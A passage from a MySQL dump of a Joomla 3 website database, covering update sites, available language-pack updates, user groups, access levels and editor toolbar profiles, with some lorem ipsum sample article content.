class=\"img\">\r\n<a href=\"#\">\r\n<img src=\"images/sampledata/icetheme/articles/image9.jpg\"  />\r\n</a>\r\n</div>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed auctor dolor sed nunc eleifend pharetra euismod vitae sapien. Vivamus nec purus felis. Nam felis lectus, feugiat ac leo non, luctus elementum augue. Duis eu lorem.</p>\r\n\r\n',1,'',0,1,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',0,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',302,'','2013-06-27 10:59:15',302,'2013-08-30 09:46:26','*','2013-06-27 10:59:15','0000-00-00 00:00:00',98,389,'{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}',1,4,3,'','',14,'',1);

--
-- Table structure for table `l_update_sites`
--

CREATE TABLE `l_update_sites` (
  `update_site_id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(100) DEFAULT '',
  `type` varchar(20) DEFAULT '',
  `location` text NOT NULL,
  `enabled` int(11) DEFAULT '0',
  `last_check_timestamp` bigint(20) DEFAULT '0',
  PRIMARY KEY (`update_site_id`)
) ENGINE=InnoDB AUTO_INCREMENT=19 DEFAULT CHARSET=utf8 COMMENT='Update Sites';

--
-- Dumping data for table `l_update_sites`
--

INSERT INTO `l_update_sites` VALUES (1,'Joomla Core','collection','http://update.joomla.org/core/list.xml',1,1423659758),(2,'Joomla Extension Directory','collection','http://update.joomla.org/jed/list.xml',0,0),(3,'Accredited Joomla! Translations','collection','http://update.joomla.org/language/translationlist_3.xml',1,1423659758),(8,'Dutch Language Updates','collection','http://download.joomlacommunity.eu/downloads/updates/translationlist_3.xml',1,1423659756),(9,'','collection','http://demo.iceteme.com/update/list.xml',0,0),(10,'Mod IceCarousel Updates','extension','http://demo.icetheme.com/update/extension.xml',0,0),(14,'plg_loadmoduleinarticle','extension','http://www.pages-and-items.com/updateserver.php?ext=loadmoduleinarticle&',1,1423659758),(15,'NoNumber Advanced Module Manager','extension','http://download.nonumber.nl/updates.php?e=advancedmodules&type=.zip',1,1423659756),(16,'IceFilter Module','extension','http://update.icetheme.com/icefilter/list.xml',1,0),(17,'Tweet Display Back Updates','extension','http://www.babdev.com/updates/TDB.xml',1,0),(18,'AllVideos','extension','http://www.joomlaworks.net/updates/jw_allvideos.xml',1,0);

--
-- Table structure for table `l_update_sites_extensions`
--

CREATE TABLE `l_update_sites_extensions` (
  `update_site_id` int(11) NOT NULL DEFAULT '0',
  `extension_id` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`update_site_id`,`extension_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Links extensions to update sites';

--
-- Dumping data for table `l_update_sites_extensions`
--

INSERT INTO `l_update_sites_extensions` VALUES (1,700),(2,700),(3,600),(3,10012),(3,10097),(3,10121),(8,10097),(9,10075),(10,10075),(14,10110),(15,10006),(15,10007),(16,10112),(17,10117),(18,10122);

--
-- Table structure for table `l_updates`
--

CREATE TABLE `l_updates` (
  `update_id` int(11) NOT NULL AUTO_INCREMENT,
  `update_site_id` int(11) DEFAULT '0',
  `extension_id` int(11) DEFAULT '0',
  `name` varchar(100) DEFAULT '',
  `description` text NOT NULL,
  `element` varchar(100) DEFAULT '',
  `type` varchar(20) DEFAULT '',
  `folder` varchar(20) DEFAULT '',
  `client_id` tinyint(3) DEFAULT '0',
  `version` varchar(10) DEFAULT '',
  `data` text NOT NULL,
  `detailsurl` text NOT NULL,
  `infourl` text NOT NULL,
  PRIMARY KEY (`update_id`)
) ENGINE=InnoDB AUTO_INCREMENT=60 DEFAULT CHARSET=utf8 COMMENT='Available Updates';

--
-- Dumping data for table `l_updates`
--

INSERT INTO `l_updates` VALUES (1,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.3.3.1','','http://update.joomla.org/language/details3/hu-HU_details.xml',''),(2,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.2.0.2','','http://update.joomla.org/language/details3/af-ZA_details.xml',''),(3,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/ar-AA_details.xml',''),(4,3,0,'Belarusian','','pkg_be-BY','package','',0,'3.2.1.1','','http://update.joomla.org/language/details3/be-BY_details.xml',''),(5,1,700,'Joomla','','joomla','file','',0,'3.2.7','','http://update.joomla.org/core/sts/extension_sts.xml',''),(6,3,0,'Bulgarian','','pkg_bg-BG','package','',0,'3.3.0.1','','http://update.joomla.org/language/details3/bg-BG_details.xml',''),(7,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/ca-ES_details.xml',''),(8,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.3.1.1','','http://update.joomla.org/language/details3/zh-CN_details.xml',''),(9,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/hr-HR_details.xml',''),(10,3,0,'Malay','','pkg_ms-MY','package','',0,'3.3.1.1','','http://update.joomla.org/language/details3/ms-MY_details.xml',''),(11,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.3.6.2','','http://update.joomla.org/language/details3/cs-CZ_details.xml',''),(12,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.3.3.1','','http://update.joomla.org/language/details3/ro-RO_details.xml',''),(13,3,0,'Danish','','pkg_da-DK','package','',0,'3.3.6.3','','http://update.joomla.org/language/details3/da-DK_details.xml',''),(14,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/nl-BE_details.xml',''),(15,3,10097,'Dutch','','pkg_nl-NL','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/nl-NL_details.xml',''),(16,3,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/zh-TW_details.xml',''),(17,3,0,'Estonian','','pkg_et-EE','package','',0,'3.3.4.1','','http://update.joomla.org/language/details3/et-EE_details.xml',''),(18,3,0,'French','','pkg_fr-FR','package','',0,'3.3.6.2','','http://update.joomla.org/language/details3/fr-FR_details.xml',''),(19,3,0,'Italian','','pkg_it-IT','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/it-IT_details.xml',''),(20,3,0,'Galician','','pkg_gl-ES','package','',0,'3.3.1.2','','http://update.joomla.org/language/details3/gl-ES_details.xml',''),(21,3,0,'Korean','','pkg_ko-KR','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/ko-KR_details.xml',''),(22,3,10012,'German','','pkg_de-DE','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/de-DE_details.xml',''),(23,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/lv-LV_details.xml',''),(24,3,0,'Greek','','pkg_el-GR','package','',0,'3.3.3.1','','http://update.joomla.org/language/details3/el-GR_details.xml',''),(25,3,0,'Macedonian','','pkg_mk-MK','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/mk-MK_details.xml',''),(26,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/ja-JP_details.xml',''),(27,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.2.2.1','','http://update.joomla.org/language/details3/nb-NO_details.xml',''),(28,3,0,'Hebrew','','pkg_he-IL','package','',0,'3.1.1.1','','http://update.joomla.org/language/details3/he-IL_details.xml',''),(29,3,0,'Persian','','pkg_fa-IR','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/fa-IR_details.xml',''),(30,3,0,'EnglishAU','','pkg_en-AU','package','',0,'3.3.1.1','','http://update.joomla.org/language/details3/en-AU_details.xml',''),(31,3,0,'Polish','','pkg_pl-PL','package','',0,'3.3.4.1','','http://update.joomla.org/language/details3/pl-PL_details.xml',''),(32,3,0,'EnglishUS','','pkg_en-US','package','',0,'3.3.1.1','','http://update.joomla.org/language/details3/en-US_details.xml',''),(33,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.3.3.1','','http://update.joomla.org/language/details3/pt-PT_details.xml',''),(34,3,10121,'Russian','','pkg_ru-RU','package','',0,'3.3.6.2','','http://update.joomla.org/language/details3/ru-RU_details.xml',''),(35,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/sk-SK_details.xml',''),(36,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/sv-SE_details.xml',''),(37,3,0,'Syriac','','pkg_sy-IQ','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/sy-IQ_details.xml',''),(38,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/ta-IN_details.xml',''),(39,3,0,'Thai','','pkg_th-TH','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/th-TH_details.xml',''),(40,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.3.5.1','','http://update.joomla.org/language/details3/tr-TR_details.xml',''),(41,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.3.3.15','','http://update.joomla.org/language/details3/uk-UA_details.xml',''),(42,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.3.0.1','','http://update.joomla.org/language/details3/ug-CN_details.xml',''),(43,3,0,'Albanian','','pkg_sq-AL','package','',0,'3.1.1.1','','http://update.joomla.org/language/details3/sq-AL_details.xml',''),(44,3,0,'Hindi','','pkg_hi-IN','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/hi-IN_details.xml',''),(45,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.0.2.1','','http://update.joomla.org/language/details3/pt-BR_details.xml',''),(46,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.3.4.1','','http://update.joomla.org/language/details3/sr-YU_details.xml',''),(47,3,0,'Spanish','','pkg_es-ES','package','',0,'3.3.4.1','','http://update.joomla.org/language/details3/es-ES_details.xml',''),(48,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/bs-BA_details.xml',''),(49,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/sr-RS_details.xml',''),(50,3,0,'Vietnamese','','pkg_vi-VN','package','',0,'3.2.1.1','','http://update.joomla.org/language/details3/vi-VN_details.xml',''),(51,3,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'3.3.0.2','','http://update.joomla.org/language/details3/id-ID_details.xml',''),(52,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.3.4.1','','http://update.joomla.org/language/details3/fi-FI_details.xml',''),(53,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/sw-KE_details.xml',''),(54,3,0,'Montenegrin','','pkg_srp-ME','package','',0,'3.3.1.1','','http://update.joomla.org/language/details3/srp-ME_details.xml',''),(55,3,0,'EnglishCA','','pkg_en-CA','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/en-CA_details.xml',''),(56,3,0,'FrenchCA','','pkg_fr-CA','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/fr-CA_details.xml',''),(57,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.3.0.1','','http://update.joomla.org/language/details3/cy-GB_details.xml',''),(58,3,0,'Sinhala','','pkg_si-LK','package','',0,'3.3.1.1','','http://update.joomla.org/language/details3/si-LK_details.xml',''),(59,14,0,'Content - Load Module in Article','Plugin to display a module into an article.','moduleinarticle','plugin','content',0,'3.1.0','','http://www.pages-and-items.com/updateserver.php?ext=loadmoduleinarticle&/extension.xml','http://www.pages-and-items.com/extensions/load-module-into-article');

--
-- Table structure for table `l_user_notes`
--

CREATE TABLE `l_user_notes` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `catid` int(10) unsigned NOT NULL DEFAULT '0',
  `subject` varchar(100) NOT NULL DEFAULT '',
  `body` text NOT NULL,
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_user_id` int(10) unsigned NOT NULL,
  `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `review_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`),
  KEY `idx_user_id` (`user_id`),
  KEY `idx_category_id` (`catid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `l_user_notes`
--


--
-- Table structure for table `l_user_profiles`
--

CREATE TABLE `l_user_profiles` (
  `user_id` int(11) NOT NULL,
  `profile_key` varchar(100) NOT NULL,
  `profile_value` varchar(255) NOT NULL,
  `ordering` int(11) NOT NULL DEFAULT '0',
  UNIQUE KEY `idx_user_id_profile_key` (`user_id`,`profile_key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Simple user profile storage table';

--
-- Dumping data for table `l_user_profiles`
--


--
-- Table structure for table `l_user_usergroup_map`
--

CREATE TABLE `l_user_usergroup_map` (
  `user_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Foreign Key to #__users.id',
  `group_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Foreign Key to #__usergroups.id',
  PRIMARY KEY (`user_id`,`group_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `l_user_usergroup_map`
--

INSERT INTO `l_user_usergroup_map` VALUES (302,8),(445,8),(981,8),(982,2),(983,2),(984,2),(985,2);

--
-- Table structure for table `l_usergroups`
--

CREATE TABLE `l_usergroups` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
  `parent_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Adjacency List Reference Id',
  `lft` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set lft.',
  `rgt` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set rgt.',
  `title` varchar(100) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_usergroup_parent_title_lookup` (`parent_id`,`title`),
  KEY `idx_usergroup_title_lookup` (`title`),
  KEY `idx_usergroup_adjacency_lookup` (`parent_id`),
  KEY `idx_usergroup_nested_set_lookup` (`lft`,`rgt`) USING BTREE
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8;

--
-- Dumping data for table `l_usergroups`
--

INSERT INTO `l_usergroups` VALUES (1,0,1,18,'Public'),(2,1,8,15,'Registered'),(3,2,9,14,'Author'),(4,3,10,13,'Editor'),(5,4,11,12,'Publisher'),(6,1,4,7,'Manager'),(7,6,5,6,'Administrator'),(8,1,16,17,'Super Users'),(9,1,2,3,'Guest');

--
-- Table structure for table `l_viewlevels`
--

CREATE TABLE `l_viewlevels` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
  `title` varchar(100) NOT NULL DEFAULT '',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `rules` varchar(5120) NOT NULL COMMENT 'JSON encoded access control.',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_assetgroup_title_lookup` (`title`)
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8;

--
-- Dumping data for table `l_viewlevels`
--

INSERT INTO `l_viewlevels` VALUES (1,'Public',0,'[1]'),(2,'Registered',1,'[6,2,8]'),(3,'Special',2,'[6,3,8]'),(5,'Guest',0,'[9]');

--
-- Table structure for table `l_weblinks`
--

CREATE TABLE `l_weblinks` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `catid` int(11) NOT NULL DEFAULT '0',
  `title` varchar(250) NOT NULL DEFAULT '',
  `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '',
  `url` varchar(250) NOT NULL DEFAULT '',
  `description` text NOT NULL,
  `hits` int(11) NOT NULL DEFAULT '0',
  `state` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `access` int(11) NOT NULL DEFAULT '1',
  `params` text NOT NULL,
  `language` char(7) NOT NULL DEFAULT '',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `metakey` text NOT NULL,
  `metadesc` text NOT NULL,
  `metadata` text NOT NULL,
  `featured` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Set if link is featured.',
  `xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `version` int(10) unsigned NOT NULL DEFAULT '1',
  `images` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`state`),
  KEY `idx_catid` (`catid`),
  KEY `idx_createdby` (`created_by`),
  KEY `idx_featured_catid` (`featured`,`catid`),
  KEY `idx_language` (`language`),
  KEY `idx_xreference` (`xreference`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `l_weblinks`
--


--
-- Table structure for table `l_wf_profiles`
--

CREATE TABLE `l_wf_profiles` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `description` text NOT NULL,
  `users` text NOT NULL,
  `types` text NOT NULL,
  `components` text NOT NULL,
  `area` tinyint(3) NOT NULL,
  `device` varchar(255) NOT NULL,
  `rows` text NOT NULL,
  `plugins` text NOT NULL,
  `published` tinyint(3) NOT NULL,
  `ordering` int(11) NOT NULL,
  `checked_out` tinyint(3) NOT NULL,
  `checked_out_time` datetime NOT NULL,
  `params` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8;

--
-- Dumping data for table `l_wf_profiles`
--

INSERT INTO `l_wf_profiles` VALUES (1,'Default','Default Profile for all users','','3,4,5,6,8,7','',0,'desktop,tablet,phone','help,newdocument,undo,redo,spacer,bold,italic,underline,strikethrough,justifyfull,justifycenter,justifyleft,justifyright,spacer,blockquote,formatselect,styleselect,removeformat,cleanup;fontselect,fontsizeselect,forecolor,backcolor,spacer,clipboard,indent,outdent,lists,sub,sup,textcase,charmap,hr;directionality,fullscreen,preview,source,print,searchreplace,spacer,table;visualaid,visualchars,visualblocks,nonbreaking,style,xhtmlxtras,anchor,unlink,link,imgmanager,spellchecker,article','contextmenu,browser,inlinepopups,media,help,clipboard,searchreplace,directionality,fullscreen,preview,source,table,textcase,print,style,nonbreaking,visualchars,visualblocks,xhtmlxtras,imgmanager,anchor,link,spellchecker,article,lists,charmap',1,1,0,'0000-00-00 00:00:00',''),(2,'Front End','Sample Front-end Profile','','3,4,5','',1,'desktop,tablet,phone','help,newdocument,undo,redo,spacer,bold,italic,underline,strikethrough,justifyfull,justifycenter,justifyleft,justifyright,spacer,formatselect,styleselect;clipboard,searchreplace,indent,outdent,lists,cleanup,charmap,removeformat,hr,sub,sup,textcase,nonbreaking,visualchars,visualblocks;fullscreen,preview,print,visualaid,style,xhtmlxtras,anchor,unlink,link,imgmanager,spellchecker,article','contextmenu,inlinepopups,help,clipboard,searchreplace,fullscreen,preview,print,style,textcase,nonbreaking,visualchars,visualblocks,xhtmlxtras,imgmanager,anchor,link,spellchecker,article,lists,charmap',0,2,0,'0000-00-00 00:00:00',''),(3,'Blogger','Simple Blogging Profile','','3,4,5,6,8,7','',0,'desktop,tablet,phone','bold,italic,strikethrough,lists,blockquote,spacer,justifyleft,justifycenter,justifyright,spacer,link,unlink,imgmanager,article,spellchecker,fullscreen,kitchensink;formatselect,underline,justifyfull,forecolor,clipboard,removeformat,charmap,indent,outdent,undo,redo,help','link,imgmanager,article,spellchecker,fullscreen,kitchensink,clipboard,contextmenu,inlinepopups,lists,charmap',0,3,0,'0000-00-00 00:00:00','{\"editor\":{\"toggle\":\"0\"}}'),(4,'Mobile','Sample Mobile Profile','','3,4,5,6,8,7','',0,'tablet,phone','undo,redo,spacer,bold,italic,underline,formatselect,spacer,justifyleft,justifycenter,justifyfull,justifyright,spacer,fullscreen,kitchensink;styleselect,lists,spellchecker,article,link,unlink','fullscreen,kitchensink,spellchecker,article,link,inlinepopups,lists',0,4,0,'0000-00-00 00:00:00','{\"editor\":{\"toolbar_theme\":\"mobile\",\"resizing\":\"0\",\"resize_horizontal\":\"0\",\"resizing_use_cookie\":\"0\",\"toggle\":\"0\",\"links\":{\"popups\":{\"default\":\"\",\"jcemediabox\":{\"enable\":\"0\"},\"window\":{\"enable\":\"0\"}}}}}');


